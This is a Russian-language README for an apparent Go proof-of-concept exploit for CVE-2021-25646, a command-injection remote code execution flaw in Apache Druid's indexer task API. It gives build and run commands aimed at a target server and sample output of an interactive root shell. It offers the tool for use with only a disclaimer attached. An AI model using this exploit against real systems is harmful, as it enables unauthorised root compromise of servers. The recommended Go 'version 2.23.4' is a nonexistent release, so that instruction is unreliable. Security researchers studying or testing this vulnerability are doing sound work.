
Доказательство концепции для CVE-2021-25646, позволяющее выполнять инъекцию команд.
Этот репозиторий содержит эксплойт доказательства концепции (PoC) для CVE-2021-25646, критической уязвимости удалённого выполнения кода в Apache Druid.
Эксплойт написан на Go и позволяет выполнять интерактивное внедрение команд через терминал.
Вам необходим установленный Go (рекомендуется версия 2.23.4).
go build .
Это создаст бинарный файл в текущем каталоге.
Вы можете запустить эксплойт, либо собрав бинарный файл, либо напрямую с помощью go run.
-i : IP-адрес целевого сервера Druid (обязательно)-p : Порт целевого сервера Druid (обязательно)-proxy : Указание URL прокси (необязательно)Запуск собранного бинарного файла:
./cve -i 127.0.0.1 -p 8888
Или запуск напрямую с Go:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
Уязвимость:
Эксплойт использует некорректную проверку ввода в компоненте Druid indexer, в частности в API task, что позволяет выполнять внедрение команд через специально сформированные JSON-нагрузки.
Ссылки:
Данное программное обеспечение предоставляется только в образовательных целях.
Автор не несёт ответственности за любое неправомерное использование или ущерб, вызванный этим кодом.
Всегда получайте соответствующее разрешение перед тестированием любой системы.